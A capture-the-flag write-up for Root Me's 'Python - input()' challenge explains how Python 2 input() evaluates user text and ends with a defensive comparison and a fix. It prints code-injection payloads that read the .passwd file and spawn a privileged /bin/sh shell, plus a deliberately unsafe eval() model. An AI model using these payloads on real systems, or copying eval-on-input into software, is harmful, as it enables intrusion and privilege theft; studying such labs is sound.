A good choice to start learning is
Root Me lets us practice with a large number of challenges, grouped into categories: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.
Let's start with the first category: App - Script.
The sixth challenge that we face is: Python - input():
Vulnerability type:
- Vulnerability Exploitation by Input() Python function
##################################################
To begin, open a terminal and type:
- ssh -p 2222 app-script-ch6@challenge02.root-me.org
to connect to the target system. If it asks for a password, enter app-script-ch6.
If we run ls -la, we see four files: ch6.py, setuid-wrapper, .passwd and setuid-wrapper.c.
setuid-wrapper simply calls the ch6.py script.
First, let's analyze the ch6.py script:

    #!/usr/bin/python2
    import sys

    def youLose():
        print "Try again ;-)"
        sys.exit(1)

    try:
        # Python 2 input() evaluates the typed text as a Python expression
        p = input("Please enter password : ")
    except:
        youLose()

    # The secret is read only after the user input has been evaluated
    with open(".passwd") as f:
        passwd = f.readline().strip()
        try:
            if (p == int(passwd)):
                print "Well done ! You can validate with this password !"
        except:
            youLose()
Reading up on it, we learn that the Python 2 input() function is vulnerable because it evaluates whatever the user types as a Python expression (it is equivalent to eval(raw_input())), so we can call any routine we like. For example, if we start the program (through setuid-wrapper, to take app-script-ch6cracked privileges) and enter youLose(), the youLose() function defined inside the script will be executed. If passwd had been defined before the input() statement, I could enter int(passwd) as input, and the if condition would always be true.
In our case, we need to read the .passwd file. To do this, start the program through setuid-wrapper, then exploit the vulnerability by entering __import__("os").system('cat .passwd'). We will get the solution.
Remember that we can also spawn a shell by entering __import__("os").execl("/bin/sh","sh"). This gives us a shell with app-script-ch6cracked privileges.
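To see why the script behaves this way and how to fix it, here is an added example (not part of the challenge or of the original write-up) that models Python 2 input() with eval() and compares it with a check that treats the typed text as data only. SECRET, calls, py2_input, vulnerable_check and hardened_check are names made up for this illustration, and the secret value is constructed.

```python
import hmac

SECRET = "13371337"   # constructed stand-in for the contents of .passwd
calls = []            # records functions reached through evaluated input


def youLose():
    calls.append("youLose")


def py2_input(typed, scope):
    """Model of Python 2 input(): the typed text is evaluated as an expression."""
    return eval(typed, scope)  # deliberately unsafe: same as eval(raw_input())


def vulnerable_check(typed, passwd_in_scope=False):
    scope = {"youLose": youLose}
    if passwd_in_scope:
        # Hypothetical variant from the text: passwd defined before input().
        scope["passwd"] = SECRET
    try:
        p = py2_input(typed, scope)
    except Exception:
        return False
    return p == int(SECRET)


def hardened_check(typed):
    """Treat the typed text as data only (what raw_input() returns in Python 2)."""
    candidate = typed.strip()
    if not (candidate.isascii() and candidate.isdigit()):
        return False
    # Constant-time comparison of the typed digits against the secret.
    return hmac.compare_digest(candidate.encode(), SECRET.encode())


if __name__ == "__main__":
    for text in ("13371337", "youLose()", "int(passwd)"):
        print(text,
              vulnerable_check(text, passwd_in_scope=True),
              hardened_check(text))
```

In the real script the fix is the same idea: read the password with raw_input() (or run under Python 3, where input() returns a string) and never pass user text to eval().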